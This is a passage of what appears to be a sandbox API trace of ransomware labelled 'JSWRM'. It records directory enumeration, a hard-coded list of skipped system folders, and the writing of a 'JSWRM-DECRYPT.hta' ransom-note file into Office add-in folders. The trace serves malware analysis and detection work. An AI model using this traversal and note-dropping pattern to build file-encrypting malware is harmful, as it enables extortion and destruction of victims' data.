ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e5d4, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.no.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.028] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0125.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0125.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.029] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b24c93, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0125.029] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0125.029] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="...") returned 1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="windows") returned -1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="recovery") returned -1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="perflogs") returned 1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="documents and settings") returned 1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="$RECYCLE.BIN") returned 1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="system volume information") returned -1 [0125.030] lstrcmpiW (lpString1="pl", lpString2="msocache") returned 1 [0125.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0125.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0125.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0125.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0125.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0125.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pl\\jswrm-decrypt.hta")) returned 0xffffffff [0125.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0125.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0125.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0125.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0125.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0125.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0125.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0125.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0125.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.033] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.033] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.034] CloseHandle (hObject=0x314) returned 1 [0125.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0125.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0125.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0125.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0125.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0125.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0125.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0125.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0125.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0125.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\pl\\jswrm-decrypt.hta")) returned 0x20 [0125.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0125.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0125.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.035] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\pl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41306d94, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0125.035] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.035] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41306d94, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.035] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.035] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.035] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7c83c72, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7c83c72, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15b9737d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4858, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.035] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2413a8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0125.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0125.036] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41306d94, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41306d94, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41306d94, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.036] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0125.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0125.037] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4620012, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4620012, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4620012, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ae8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.037] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0125.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0125.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0125.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0125.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.037] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44c8b33, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44c8b33, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.037] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.037] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.037] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0125.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0125.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0125.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.038] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x231c662, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x231c662, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x231c662, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b30, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.038] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0125.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 